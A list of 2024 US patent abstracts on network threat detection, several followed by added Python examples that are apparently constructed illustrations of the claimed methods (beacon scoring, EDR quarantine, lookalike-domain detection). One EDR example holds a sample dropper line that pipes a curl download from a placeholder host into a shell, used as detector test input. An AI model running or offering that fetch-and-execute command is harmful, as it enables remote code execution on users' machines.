-
Publication number: US20240364722A1
Publication date: 2024-10-31
Application number: US18308857
Application date: 2023-04-28
Applicant: HEWLETT PACKARD ENTERPRISE DEVELOPMENT LP
Inventor: Nirmal Rajarathnam , Navaneethan Venugopal , Bhagvan Cheeyandria
IPC: H04L9/40
CPC classification number: H04L63/1425 , H04L63/145 , H04L63/20
Abstract: A process includes prioritizing candidate network traffic flow profiles. The prioritization includes associating perception scores with respective candidate network traffic flow profiles. Each candidate network traffic flow profile is a member of one profile group of a plurality of profile groups. The process includes associating weights with respective profile groups of the plurality of profile groups. The process includes, responsive to a network traffic flow, identifying, by a traffic analysis engine, a first observed profile of the network traffic flow corresponding to a first candidate network traffic flow profile. The process includes, based on the perception score associated with the first candidate network traffic flow profile and the weight associated with the profile group of which the first candidate network traffic flow profile is a member, determining a policy score; and selecting, by the traffic analysis engine, a policy to be applied to the network traffic flow based on the policy score.
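The scoring chain the abstract describes, as an added example that is not HPE's code and not taken from the patent: candidate profiles carry a perception score and belong to a group, groups carry a weight, the policy score is the product, and the score is mapped onto policy bands. The flow fields, profile predicates, score values, group weights and policy bands are all constructed assumptions; prioritization is implemented here as evaluating candidates in descending policy-score order so that the highest-scoring match wins when a flow fits several profiles.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

# Constructed flow record: the fields a traffic analysis engine would extract (assumed).
@dataclass(frozen=True)
class Flow:
    proto: str
    dst_port: int
    byte_count: int
    packet_count: int
    duration_s: float

@dataclass(frozen=True)
class CandidateProfile:
    name: str
    group: str                       # profile group the candidate belongs to
    perception: float                # perception score in [0, 1] (assumed scale)
    matches: Callable[[Flow], bool]  # predicate deciding whether a flow exhibits this profile

# Constructed candidate profiles; names, predicates and scores are illustrative assumptions.
CANDIDATES: List[CandidateProfile] = [
    CandidateProfile("bulk-transfer", "volumetric", 0.4,
                     lambda f: f.byte_count / max(f.duration_s, 1e-3) > 1_000_000),
    CandidateProfile("dns-tunnel-like", "covert-channel", 0.9,
                     lambda f: f.proto == "udp" and f.dst_port == 53
                     and f.byte_count / max(f.packet_count, 1) > 300),
    CandidateProfile("web-browsing", "interactive", 0.1,
                     lambda f: f.proto == "tcp" and f.dst_port in (80, 443)),
    CandidateProfile("scan-like", "reconnaissance", 0.8,
                     lambda f: f.packet_count <= 2 and f.byte_count < 200),
]

# Weight per profile group (assumed values); an operator can raise or lower a whole group at once.
GROUP_WEIGHTS: Dict[str, float] = {
    "volumetric": 0.8, "covert-channel": 1.0, "interactive": 0.2, "reconnaissance": 0.9,
}

# Policy bands on the policy score, highest threshold first (assumed).
POLICY_BANDS: List[Tuple[float, str]] = [(0.6, "block"), (0.3, "rate-limit"), (0.0, "allow")]

def policy_score(profile: CandidateProfile) -> float:
    """Policy score = perception score x weight of the profile's group."""
    return profile.perception * GROUP_WEIGHTS[profile.group]

def prioritize(candidates: List[CandidateProfile]) -> List[CandidateProfile]:
    """Order candidates so that, when several match one flow, the highest policy score wins."""
    return sorted(candidates, key=policy_score, reverse=True)

def identify_profile(flow: Flow, candidates: List[CandidateProfile]) -> Optional[CandidateProfile]:
    """Return the first candidate (in priority order) whose predicate the flow satisfies."""
    for cand in prioritize(candidates):
        if cand.matches(flow):
            return cand
    return None

def select_policy(flow: Flow, candidates: List[CandidateProfile] = CANDIDATES) -> Tuple[str, float, str]:
    """Identify the observed profile, derive its policy score and map the score to a policy."""
    profile = identify_profile(flow, candidates)
    if profile is None:
        return ("unknown", 0.0, "allow")   # no candidate matched: default policy (assumed)
    score = round(policy_score(profile), 3)
    for threshold, policy in POLICY_BANDS:
        if score >= threshold:
            return (profile.name, score, policy)
    return (profile.name, score, "allow")

if __name__ == "__main__":
    for flow in (Flow("udp", 53, 4000, 8, 2.0), Flow("tcp", 443, 150_000, 120, 5.0),
                 Flow("tcp", 445, 5_000_000, 4000, 2.0), Flow("tcp", 22, 120, 1, 0.01)):
        print(flow, "->", select_policy(flow))
```

Because the weight lives on the group rather than on each profile, lowering `GROUP_WEIGHTS["volumetric"]` demotes every volumetric profile at once, which is the operational point of separating perception scores from group weights.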
-
Publication number: US12126638B2
Publication date: 2024-10-22
Application number: US17386295
Application date: 2021-07-27
Applicant: ROYAL BANK OF CANADA
Inventor: Nariman Mammadli , Atanas Viyachki
CPC classification number: H04L63/1425 , G06F18/217 , H04L63/1416 , H04L63/145 , H04L63/1466
Abstract: Systems and methods for adaptively identifying anomalous network communication traffic. The system includes a processor and a memory coupled to the processor. The memory includes processor-executable instructions that configure the processor to: obtain data associated with a sequence of network communication events; determine that the sequence of network communication events is generated by a computing agent based on a symmetricity measure associated with the sequence; generate a threat prediction value for the sequence of network communication events determined to be generated by the computing agent, based on a combination of the symmetricity measure and a randomness measure associated with the network communication events; and transmit a signal communicating that the sequence of network communication events is a potentially malicious sequence, based on the threat prediction value.
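An added example of the two-measure approach, written for this page and not taken from the patent or from Royal Bank of Canada's implementation. The page does not define the measures, so the following are assumptions: symmetricity is taken as the regularity of inter-event intervals (1 minus the coefficient of variation, clamped to [0, 1]); randomness is the normalised Shannon entropy of a per-event token such as the request path; a sequence is attributed to a computing agent when symmetricity exceeds an assumed cut-off; and the threat value is the product of the two measures for agent-generated sequences. The three event sequences are constructed, not captured traffic.

```python
import math
from collections import Counter
from statistics import mean, pstdev
from typing import Dict, List, Sequence, Tuple

AGENT_SYMMETRICITY = 0.8   # assumed cut-off: above this, timing is too regular for a human

def symmetricity(timestamps: Sequence[float]) -> float:
    """Regularity of inter-event intervals as 1 - coefficient of variation, clamped to [0, 1].
    Assumed definition; a nearly constant interval gives a value near 1."""
    if len(timestamps) < 3:
        return 0.0
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    mu = mean(gaps)
    if mu <= 0:
        return 0.0
    return max(0.0, 1.0 - pstdev(gaps) / mu)

def randomness(tokens: Sequence[str]) -> float:
    """Normalised Shannon entropy of the per-event tokens (e.g. request paths), in [0, 1]."""
    n = len(tokens)
    if n <= 1:
        return 0.0
    counts = Counter(tokens)
    entropy = -sum((c / n) * math.log2(c / n) for c in counts.values())
    return entropy / math.log2(n)   # log2(n) is the maximum, reached when every token differs

def analyze(events: List[Tuple[float, str]]) -> Dict[str, object]:
    """events: (timestamp_seconds, request_path) pairs for one client/destination pair."""
    ts = [t for t, _ in events]
    paths = [p for _, p in events]
    sym = symmetricity(ts)
    rnd = randomness(paths)
    is_agent = sym >= AGENT_SYMMETRICITY
    # Assumed combination: only automated sequences are scored, and the score rises with both measures,
    # so a regular agent that always fetches the same path (an updater) scores low.
    threat = sym * rnd if is_agent else 0.0
    return {"symmetricity": sym, "randomness": rnd, "is_agent": is_agent, "threat": threat}

# Constructed samples (not real traffic).
BEACON = [(0, "/a8f3k"), (60, "/q91zz"), (121, "/m2xp0"), (180, "/77hhd"),
          (240, "/bb1ue"), (301, "/z0q1r"), (360, "/k9s2t"), (420, "/e4r5y")]
UPDATE_CHECK = [(3600 * i, "/update/check") for i in range(8)]
HUMAN = [(0, "/"), (2, "/login"), (47, "/inbox"), (48, "/inbox"),
         (348, "/mail/123"), (355, "/inbox"), (445, "/logout"), (448, "/")]

if __name__ == "__main__":
    for name, seq in (("beacon", BEACON), ("update-check", UPDATE_CHECK), ("human", HUMAN)):
        print(name, analyze(seq))
```

The beacon (near-constant 60 s interval, every path different) is both an agent and high-threat; the hourly update check is an agent but scores zero because its paths carry no entropy; the human session fails the symmetricity cut-off and is never scored. In production the jitter a real implant adds would lower symmetricity, so the cut-off and the window length need tuning on the enterprise's own traffic.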
-
Publication number: US12120519B2
Publication date: 2024-10-15
Application number: US17674285
Application date: 2022-02-17
Applicant: Lookout, Inc.
Inventor: David Richardson , Ahmed Mohamed Farrakha , William Neil Robinson , Brian James Buck
IPC: H04W12/128 , G06F21/50 , G06F21/51 , G06F21/56 , H04L9/40 , H04W12/122 , H04W12/37
CPC classification number: H04W12/128 , G06F21/50 , G06F21/51 , H04L63/145 , H04W12/122 , H04W12/37 , G06F21/56 , G06F2221/033
Abstract: For increased security, a source is determined for software to be installed on a computing device. In one approach, a side-load server receives, from a mobile device, data regarding an application to be installed on the mobile device. The server determines a source of the application, then sends, to an authenticity server, data regarding the source. The server receives, from the authenticity server, a first state designation for the application. In response to receiving the first state designation, the server sets a second state designation, and sends the second state designation to the mobile device (e.g., to permit or block installation of the application).
-
Publication number: US12113814B2
Publication date: 2024-10-08
Application number: US18520806
Application date: 2023-11-28
Applicant: Kandji, Inc.
Inventor: Adam Pettit , Wesley Pettit , Mark Daughters , Brandon Modesitt
IPC: H04L9/40
CPC classification number: H04L63/1416 , H04L63/145
Abstract: A method involves receiving a plurality of security rules from a remote management platform at an endpoint detection and response (EDR) module at a user device. The EDR module subscribes to one or more event types at the user device. The EDR module receives a notification of an event corresponding to one of the subscribed event types. Upon determining that the event is associated with a file stored at the user device, the EDR module instantiates an event tracer tree that is associated with the file. The EDR module generates a file hash value for the file using the event tracer tree. Upon determining that the file hash value satisfies a security rule, the EDR module quarantines the file and reports that the file has been quarantined.
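An added example of the event flow the abstract describes, written for this page and not Kandji's code: the module subscribes to a set of event types, instantiates a tracer tree the first time a file is seen, records the file's events in it, follows the file across a rename, hashes the content recorded in the tree when the file is closed, and quarantines on a rule hit. The event types, the tree layout, the idea that write events carry the written bytes, and the hash-keyed rule table are assumptions; the payload and its rule are constructed (the hash is of that constructed text, not a real malware hash).

```python
import hashlib
from dataclasses import dataclass, field
from typing import Dict, List, Optional

@dataclass
class Event:
    etype: str              # e.g. "file.create", "file.write", "file.rename", "file.close"
    path: str
    pid: int
    data: bytes = b""       # bytes written, for file.write events (constructed)
    new_path: str = ""      # destination, for file.rename events

@dataclass
class TracerNode:
    """Event tracer tree for one file: the file is the root, its events are the leaves."""
    path: str
    events: List[Event] = field(default_factory=list)
    chunks: List[bytes] = field(default_factory=list)   # written content, in order

class EDRModule:
    SUBSCRIBED = {"file.create", "file.write", "file.rename", "file.close"}

    def __init__(self, rules: Dict[str, str]):
        self.rules = rules   # sha256 hex -> rule name, as received from the management platform
        self.trees: Dict[str, TracerNode] = {}
        self.quarantined: Dict[str, str] = {}
        self.reports: List[dict] = []

    def on_event(self, ev: Event) -> Optional[str]:
        """Notification callback; returns the verdict when a file is closed, otherwise None."""
        if ev.etype not in self.SUBSCRIBED:
            return None                        # not a subscribed event type
        node = self.trees.get(ev.path)
        if node is None:                       # first event for this file: instantiate its tracer tree
            node = TracerNode(ev.path)
            self.trees[ev.path] = node
        node.events.append(ev)
        if ev.etype == "file.write":
            node.chunks.append(ev.data)
        elif ev.etype == "file.rename":        # keep following the file under its new name
            del self.trees[ev.path]
            node.path = ev.new_path
            self.trees[ev.new_path] = node
        elif ev.etype == "file.close":
            return self._evaluate(node)
        return None

    def _evaluate(self, node: TracerNode) -> str:
        # The hash is built from the content recorded in the tracer tree rather than by re-reading disk.
        digest = hashlib.sha256(b"".join(node.chunks)).hexdigest()
        rule = self.rules.get(digest)
        if rule is None:
            return "clean"
        self.quarantined[node.path] = digest
        self.reports.append({"path": node.path, "sha256": digest, "rule": rule,
                             "events": len(node.events)})
        return "quarantined"

# Constructed sample: a blocklisted payload and the rule keyed by its hash (not a real malware hash).
MALICIOUS_SAMPLE = b"#!/bin/sh\ncurl -s http://example.invalid/x | sh\n"
RULES = {hashlib.sha256(MALICIOUS_SAMPLE).hexdigest(): "blocklisted-dropper-hash"}

def run_scenario() -> EDRModule:
    """Drive the module with a constructed event stream: one dropper, one benign file."""
    edr = EDRModule(RULES)
    edr.on_event(Event("file.create", "/tmp/upd", 4242))
    edr.on_event(Event("file.write", "/tmp/upd", 4242, MALICIOUS_SAMPLE[:12]))
    edr.on_event(Event("file.write", "/tmp/upd", 4242, MALICIOUS_SAMPLE[12:]))
    edr.on_event(Event("file.rename", "/tmp/upd", 4242, new_path="/tmp/update.sh"))
    edr.on_event(Event("process.exec", "/bin/ls", 4243))          # not subscribed: ignored
    edr.on_event(Event("file.close", "/tmp/update.sh", 4242))
    edr.on_event(Event("file.create", "/tmp/notes.txt", 4300))
    edr.on_event(Event("file.write", "/tmp/notes.txt", 4300, b"meeting at 10\n"))
    edr.on_event(Event("file.close", "/tmp/notes.txt", 4300))
    return edr

if __name__ == "__main__":
    print(run_scenario().reports)
```

Keeping the tree keyed by the file rather than by path is what lets the verdict land on `/tmp/update.sh` even though every write happened under `/tmp/upd`; a hash taken only at the final path would miss a dropper that writes under one name and renames before execution.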
-
Publication number: US12107883B2
Publication date: 2024-10-01
Application number: US17188601
Application date: 2021-03-01
Applicant: Citrix Systems, Inc.
Inventor: Asterios Stergioudis
CPC classification number: H04L63/145 , G06N20/00 , H04L67/14
Abstract: Described embodiments provide systems and methods for managing a session accessed by a client device. The systems and methods can include one or more processors configured to receive data in a plurality of modalities corresponding to a plurality of features of a session for an entity accessed by a client device. The one or more processors can determine, based on the data of the session and a distance model trained with historical data of the entity, a distance between a representation of the data of the session and a predetermined representation for the entity established from the historical data of the entity. The one or more processors can compare the distance with a threshold established for the entity. The one or more processors can generate, based on the comparison of the distance with the threshold, an action to manage access by the client device to the session for the entity.
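A concrete instance of the per-entity distance model, added here as an illustration and not Citrix's implementation. The choices below are assumptions: numeric modalities are standardised against the entity's own mean and standard deviation, categorical modalities contribute one minus the historical frequency of the observed value (so an unseen country or device counts as a full unit of deviation), the distance is Euclidean over those components, the entity's threshold is a multiple of its largest training distance, and the action bands are allow / step-up authentication / terminate. The session history is constructed.

```python
import math
from collections import Counter
from statistics import mean, pstdev
from typing import Dict, List, Tuple

NUMERIC = ("hour", "mb_transferred", "duration_min")   # assumed numeric modalities
CATEGORICAL = ("country", "device")                    # assumed categorical modalities

class EntityDistanceModel:
    """Per-entity distance model trained on that entity's historical sessions (assumed design)."""

    def __init__(self, history: List[Dict], threshold_factor: float = 1.5):
        n = len(history)
        self.mu = {f: mean(s[f] for s in history) for f in NUMERIC}
        self.sigma = {f: max(pstdev([s[f] for s in history]), 1e-6) for f in NUMERIC}
        self.freq = {f: {k: c / n for k, c in Counter(s[f] for s in history).items()}
                     for f in CATEGORICAL}
        # The threshold is set per entity from its own training distances (assumed rule).
        self.threshold = threshold_factor * max(self.distance(s) for s in history)

    def distance(self, session: Dict) -> float:
        """Euclidean distance between the session and the entity's baseline representation."""
        sq = 0.0
        for f in NUMERIC:                           # standardised numeric deviation
            z = (session[f] - self.mu[f]) / self.sigma[f]
            sq += z * z
        for f in CATEGORICAL:                       # unseen category = full unit of deviation
            sq += (1.0 - self.freq[f].get(session[f], 0.0)) ** 2
        return math.sqrt(sq)

    def action(self, session: Dict) -> Tuple[str, float]:
        """Map the distance/threshold comparison to a session-management action."""
        d = self.distance(session)
        if d > 2 * self.threshold:
            return "terminate", d
        if d > self.threshold:
            return "step-up-auth", d
        return "allow", d

def make_history() -> List[Dict]:
    """Constructed history for one entity; not real telemetry."""
    hours = [9, 10, 11, 9, 14, 15, 16, 10, 13, 17, 12, 11]
    mbs = [80, 120, 95, 60, 140, 110, 75, 130, 100, 90, 85, 115]
    mins = [45, 60, 30, 50, 90, 70, 40, 55, 65, 35, 80, 60]
    devices = ["laptop"] * 10 + ["phone"] * 2
    return [{"hour": h, "mb_transferred": m, "duration_min": d, "country": "US", "device": dev}
            for h, m, d, dev in zip(hours, mbs, mins, devices)]

# Constructed session that deviates on every modality at once.
ANOMALOUS = {"hour": 3, "mb_transferred": 5000, "duration_min": 400,
             "country": "RU", "device": "unknown"}

if __name__ == "__main__":
    model = EntityDistanceModel(make_history())
    print("threshold", round(model.threshold, 2))
    print("normal  ", model.action(make_history()[0]))
    print("anomaly ", model.action(ANOMALOUS))
```

The threshold being derived from each entity's own history is the practical point: a night-shift engineer whose sessions routinely start at 03:00 gets a baseline in which that hour is unremarkable, so one global threshold would either miss attacks on regular users or flood the night shift with step-up prompts.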
-
Publication number: US12107876B2
Publication date: 2024-10-01
Application number: US17665218
Application date: 2022-02-04
Inventor: Takeshi Kishikawa , Ryo Hirano , Tomoyuki Haga , Yoshihiro Ujiie
IPC: H04L9/40
CPC classification number: H04L63/1425 , H04L63/02 , H04L63/145
Abstract: A control network system is connected to electronic control unit(s) and a communication device, and includes security sensor(s) that transmit a security alert to the network when an indication of a security breach is detected in at least one of the network, the electronic control unit(s), or the communication device. The intrusion path analysis device includes: an alert obtainer that obtains the security alert from the security sensor(s); an event obtainer that obtains an event history of events that occur in the control network system; and an intrusion path analyzer that analyzes the intrusion path of an attack on the basis of the security alert, the event history, and an intrusion depth indicating the intrusion level to be assumed when the security alert occurs, and that outputs the result of the analysis.
-
Publication number: US12107869B1
Publication date: 2024-10-01
Application number: US17153807
Application date: 2021-01-20
Applicant: Anvilogic, Inc.
Inventor: Karthik Kannan , Deb Banerjee , Mackenzie Kyle , Benjamin Arnold , Kevin Gonzalez , Jeswanth Manikonda
CPC classification number: H04L63/1416 , H04L63/105 , H04L63/1425 , H04L63/145 , H04L63/20
Abstract: A dynamic threat landscape to which the computer resources of a specific enterprise are subject is tracked. Data feeds maintained by a security system of the enterprise are assessed, and the effectiveness of data feed utilization by the security system is quantified relative to the threat landscape. Threat detection rules deployed by the security system are assessed, and the effectiveness of their utilization by the security system is quantified. The capability to process alerts generated by threat detection rules and the threat response capability may also be assessed and quantified. The effectiveness of the security system as a whole is automatically quantified, based on the tracked threat landscape and the quantifications of the effectiveness of data feed utilization, threat detection rule utilization, alert processing capability and/or threat response capability. Recommendations for more effectively protecting the enterprise against specific threats are output. Actions are automatically taken to mitigate specific threats.
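An added example of how the feed and rule quantifications can be computed against a weighted threat landscape; it is written for this page and is not Anvilogic's scoring. Everything in it is an assumption: the landscape is a set of threats with an enterprise-specific weight and the techniques each uses (the technique names are illustrative placeholders; a deployment would key on a real taxonomy), a feed is "utilized" only if ingested, a rule is effective only if enabled and every feed it depends on is ingested, each score is the weight-share of landscape techniques covered, the overall figure is a plain average of the two, and recommendations are ranked by the coverage gained from closing one gap at a time.

```python
from typing import Dict, List, Set, Tuple

# Constructed inputs; technique names are placeholders for a real taxonomy.
THREAT_LANDSCAPE: Dict[str, Tuple[float, Set[str]]] = {
    # threat -> (relevance weight for this enterprise, techniques the threat uses)
    "ransomware":    (0.5, {"phishing", "script-exec", "cred-dump", "lateral-rdp", "encrypt-impact"}),
    "bec":           (0.3, {"phishing"}),
    "insider-exfil": (0.2, {"lateral-rdp"}),
}
DATA_FEEDS: Dict[str, Tuple[bool, Set[str]]] = {
    # feed -> (currently ingested by the security system?, techniques observable in that feed)
    "email-gateway":        (True,  {"phishing"}),
    "edr":                  (True,  {"script-exec", "cred-dump", "encrypt-impact"}),
    "windows-security-log": (False, {"lateral-rdp", "cred-dump"}),
}
DETECTION_RULES: Dict[str, Tuple[bool, Set[str], Set[str]]] = {
    # rule -> (enabled?, feeds the rule needs, techniques it detects)
    "phish-attachment":      (True,  {"email-gateway"},        {"phishing"}),
    "suspicious-powershell": (True,  {"edr"},                  {"script-exec"}),
    "lsass-access":          (False, {"edr"},                  {"cred-dump"}),
    "rdp-lateral":           (True,  {"windows-security-log"}, {"lateral-rdp"}),
    "mass-file-encrypt":     (True,  {"edr"},                  {"encrypt-impact"}),
}

def weighted_coverage(landscape, techniques: Set[str]) -> float:
    """Share of the threat landscape (by weight) whose techniques fall inside `techniques`."""
    total = sum(w for w, _ in landscape.values())
    covered = sum(w * len(t & techniques) / len(t) for w, t in landscape.values())
    return covered / total

def ingested_techniques(feeds) -> Set[str]:
    return set().union(*(t for ingested, t in feeds.values() if ingested))

def effective_rules(rules, feeds) -> Set[str]:
    """A rule only contributes when it is enabled and every feed it depends on is ingested."""
    return {name for name, (enabled, needs, _) in rules.items()
            if enabled and all(feeds[f][0] for f in needs)}

def detected_techniques(rules, feeds) -> Set[str]:
    return set().union(*(rules[r][2] for r in effective_rules(rules, feeds)))

def assess(landscape=THREAT_LANDSCAPE, feeds=DATA_FEEDS, rules=DETECTION_RULES) -> Dict:
    feed_score = weighted_coverage(landscape, ingested_techniques(feeds))
    rule_score = weighted_coverage(landscape, detected_techniques(rules, feeds))
    # Recommendations: coverage gained by fixing each single gap (missing feed or disabled rule).
    recs: List[Tuple[str, float]] = []
    for name, (ingested, obs) in feeds.items():
        if not ingested:
            trial = dict(feeds); trial[name] = (True, obs)
            gain = weighted_coverage(landscape, detected_techniques(rules, trial)) - rule_score
            recs.append((f"ingest feed {name}", gain))
    for name, (enabled, needs, techs) in rules.items():
        if not enabled:
            trial = dict(rules); trial[name] = (True, needs, techs)
            gain = weighted_coverage(landscape, detected_techniques(trial, feeds)) - rule_score
            recs.append((f"enable rule {name}", gain))
    recs.sort(key=lambda r: r[1], reverse=True)
    return {"feed_utilization": feed_score, "detection_coverage": rule_score,
            "overall": 0.5 * (feed_score + rule_score), "recommendations": recs}

if __name__ == "__main__":
    for k, v in assess().items():
        print(k, v)
```

Two things the numbers make visible that a rule inventory alone does not: `rdp-lateral` is enabled yet contributes nothing because its feed is not ingested, and because the landscape is weighted, ingesting that one feed is worth three times as much as re-enabling `lsass-access`. Re-running `assess` as the landscape weights shift is what makes the quantification track a dynamic landscape.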
-
Publication number: US20240323223A1
Publication date: 2024-09-26
Application number: US18680878
Application date: 2024-05-31
Applicant: Infoblox Inc.
Inventor: Vadym Tymchenko
IPC: H04L9/40 , H04L61/4511
CPC classification number: H04L63/145 , H04L61/4511 , H04L63/0236 , H04L63/0263 , H04L63/101
Abstract: Various techniques for detecting visual similarity between DNS fully qualified domain names (FQDNs) are disclosed. In some embodiments, a system, process, and/or computer program product for detecting visual similarity between DNS FQDNs includes receiving a DNS data stream, wherein the DNS data stream includes a DNS query and a DNS response for resolution of the DNS query; performing extended sequence alignment for each FQDN in the set of FQDNs observed in the DNS data stream to identify potential malware FQDNs for one or more target FQDNs based on visual similarity; and classifying the set of domains as malware FQDNs or benign FQDNs based on the results of the extended sequence alignment.
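An added, self-contained example of sequence alignment used for visual lookalike detection; it is not Infoblox's algorithm, and the page does not say what "extended" means in the patent, so the extension here is an assumption: a Needleman-Wunsch global alignment whose cost model charges nothing for an exact character, a small cost for a substitution within a visually confusable class, a full unit for any other substitution or gap, and a small cost for two glyphs that read as one ("rn" for "m", "vv" for "w", "cl" for "d"). Similarity is one minus the alignment cost normalised by the longer name. The confusable sets, cost values, threshold and the DNS records are all constructed.

```python
from typing import Dict, List, Tuple

# Cost model (assumed values): exact match free, visually confusable substitutions cheap,
# everything else a full unit. The classes and pairs are a small illustrative set.
CONFUSABLE_CLASSES = [set("0o"), set("1li"), set("5s"), set("2z")]
CONFUSABLE_PAIRS = {("rn", "m"), ("vv", "w"), ("cl", "d")}   # two glyphs that read as one
MATCH, CONFUSABLE, MISMATCH, GAP, PAIR = 0.0, 0.2, 1.0, 1.0, 0.3

def sub_cost(x: str, y: str) -> float:
    if x == y:
        return MATCH
    return CONFUSABLE if any(x in c and y in c for c in CONFUSABLE_CLASSES) else MISMATCH

def align_cost(a: str, b: str) -> float:
    """Global (Needleman-Wunsch style) alignment cost, extended with 2-to-1 glyph substitutions."""
    n, m = len(a), len(b)
    inf = float("inf")
    D = [[inf] * (m + 1) for _ in range(n + 1)]
    D[0][0] = 0.0
    for i in range(n + 1):
        for j in range(m + 1):
            if i == 0 and j == 0:
                continue
            best = inf
            if i > 0:
                best = min(best, D[i - 1][j] + GAP)                    # delete a[i-1]
            if j > 0:
                best = min(best, D[i][j - 1] + GAP)                    # insert b[j-1]
            if i > 0 and j > 0:
                best = min(best, D[i - 1][j - 1] + sub_cost(a[i - 1], b[j - 1]))
            if i > 1 and j > 0 and (a[i - 2:i], b[j - 1]) in CONFUSABLE_PAIRS:
                best = min(best, D[i - 2][j - 1] + PAIR)               # e.g. "rn" read as "m"
            if i > 0 and j > 1 and (b[j - 2:j], a[i - 1]) in CONFUSABLE_PAIRS:
                best = min(best, D[i - 1][j - 2] + PAIR)               # e.g. "m" written as "rn"
            D[i][j] = best
    return D[n][m]

def visual_similarity(a: str, b: str) -> float:
    return 1.0 - align_cost(a, b) / max(len(a), len(b), 1)

def normalize(fqdn: str) -> str:
    return fqdn.lower().rstrip(".")

def classify(dns_stream: List[Dict], targets: List[str],
             threshold: float = 0.9) -> Dict[str, Tuple[str, str, float]]:
    """Label each queried FQDN 'malware' (lookalike of a target) or 'benign'; exact targets are benign."""
    results = {}
    for rec in dns_stream:
        q = normalize(rec["qname"])
        best_t, best_s = max(((t, visual_similarity(q, normalize(t))) for t in targets),
                             key=lambda p: p[1])
        verdict = "malware" if q != normalize(best_t) and best_s >= threshold else "benign"
        results[q] = (verdict, best_t, round(best_s, 4))
    return results

# Constructed DNS query/response records (not captured traffic).
DNS_STREAM = [
    {"qname": "paypal.com.", "rcode": "NOERROR"},
    {"qname": "paypa1.com.", "rcode": "NOERROR"},
    {"qname": "rnicrosoft.com.", "rcode": "NOERROR"},
    {"qname": "github.com.", "rcode": "NOERROR"},
    {"qname": "wikipedia.org.", "rcode": "NOERROR"},
]
TARGETS = ["paypal.com", "microsoft.com"]

if __name__ == "__main__":
    for name, verdict in classify(DNS_STREAM, TARGETS).items():
        print(f"{name:18} {verdict}")
```

Plain edit distance would charge `rnicrosoft.com` a deletion plus a substitution, the same as any two-character typo, and so rank it no closer to `microsoft.com` than random noise; the 2-to-1 rule is what lets the alignment recognise that the two names render almost identically. The same DP accommodates further extensions (Unicode confusables, keyboard-adjacency costs) by adding entries to the cost tables rather than changing the algorithm.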
-
Publication number: US12101336B2
Publication date: 2024-09-24
Application number: US17825120
Application date: 2022-05-26
Applicant: Sophos Limited
Inventor: Biju Balakrishnan Nair , Brian Steven Vysocky, Jr.
CPC classification number: H04L63/1408 , G06F21/53 , G06F21/567 , H04L63/1416 , H04L63/1425 , H04L63/1433 , H04L63/1441 , H04L63/145 , H04L63/20
Abstract: A threat management facility for an enterprise network integrates native threat management capabilities with threat data from a cloud service provider used by the enterprise. By properly authenticating to the cloud service and mapping data feeds from the cloud service to a native threat management environment, the threat management facility can extend threat detection and management capabilities beyond endpoint-centric techniques.
-
Publication number: US12101322B2
Publication date: 2024-09-24
Application number: US17520394
Application date: 2021-11-05
Applicant: Infoblox Inc.
Inventor: Renee Carol Burton
IPC: H04L29/06 , H04L9/40 , H04L12/911 , H04L29/12 , H04L47/70 , H04L61/4511
CPC classification number: H04L63/101 , H04L47/70 , H04L61/4511 , H04L63/0227 , H04L63/1425 , H04L63/145 , H04L63/1466 , H04L63/1483
Abstract: Techniques for smart whitelisting for Domain Name System (DNS) security are provided. In some embodiments, a system/process/computer program product for smart whitelisting for DNS security includes receiving a set of network related event data, wherein the set of network related event data includes DNS related event data; receiving a set of network related threat data, wherein the set of network related threat data includes DNS related threat data; and generating a whitelist using the set of network related event data and the set of network related threat data, wherein the whitelist includes a subset of the network domains included in the DNS related event data, selected by a data driven model of the DNS related event data and the DNS related threat data.
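An added example of one data-driven selection over DNS event data and threat data, written for this page and not Infoblox's model. The criteria are assumptions: a domain is whitelisted only if it was resolved by at least a minimum number of distinct clients on at least a minimum number of distinct days, its NXDOMAIN share is low (a domain that mostly fails to resolve is not worth whitelisting, whatever its popularity), and neither it nor any parent domain appears in the threat data. The event records and threat list are constructed and use reserved example names.

```python
from collections import defaultdict
from typing import Dict, List, Set

def is_threat_listed(domain: str, threat_domains: Set[str]) -> bool:
    """True if the domain or any parent domain (excluding the bare TLD) appears in the threat data."""
    labels = domain.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in threat_domains for i in range(len(labels) - 1))

def aggregate(events: List[Dict]) -> Dict[str, Dict]:
    """Per-domain statistics from DNS event data: distinct clients, distinct days, NXDOMAIN count."""
    stats = defaultdict(lambda: {"clients": set(), "days": set(), "queries": 0, "nx": 0})
    for e in events:
        s = stats[e["qname"].lower().rstrip(".")]
        s["clients"].add(e["client"])
        s["days"].add(e["ts"][:10])          # ISO timestamp: first 10 chars are the date
        s["queries"] += 1
        if e["rcode"] == "NXDOMAIN":
            s["nx"] += 1
    return stats

def build_whitelist(events: List[Dict], threat_domains: Set[str], min_clients: int = 3,
                    min_days: int = 2, max_nx_ratio: float = 0.1) -> List[str]:
    """Select domains that are broadly and steadily resolved and never threat-listed (assumed criteria)."""
    out = []
    for domain, s in aggregate(events).items():
        if is_threat_listed(domain, threat_domains):
            continue                          # threat data always overrides popularity
        if (len(s["clients"]) >= min_clients and len(s["days"]) >= min_days
                and s["nx"] / s["queries"] <= max_nx_ratio):
            out.append(domain)
    return sorted(out)

def make_events() -> List[Dict]:
    """Constructed DNS event data (not real logs)."""
    ev: List[Dict] = []
    def add(qname, clients, days, rcode="NOERROR"):
        for c in clients:
            for d in days:
                ev.append({"ts": f"{d}T08:00:00", "client": c, "qname": qname, "rcode": rcode})
    three = ["10.0.0.1", "10.0.0.2", "10.0.0.3"]
    two_days = ["2024-10-01", "2024-10-02"]
    add("updates.example.net", three + ["10.0.0.4"], two_days + ["2024-10-03"])
    add("cdn.example.net", three, two_days)
    add("c2.bad.example", three, two_days)                      # popular, but parent is threat-listed
    add("onlyone.example.net", ["10.0.0.9"], two_days)          # a single client: not broad enough
    add("x7k2q.example.net", three, two_days, rcode="NXDOMAIN")  # never resolves
    return ev

THREAT_DOMAINS = {"bad.example"}

if __name__ == "__main__":
    print(build_whitelist(make_events(), THREAT_DOMAINS))
```

The parent-domain check matters because threat data often lists the registered domain while event data carries its subdomains; without it, a busy command-and-control host under a listed domain would qualify on popularity alone.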
-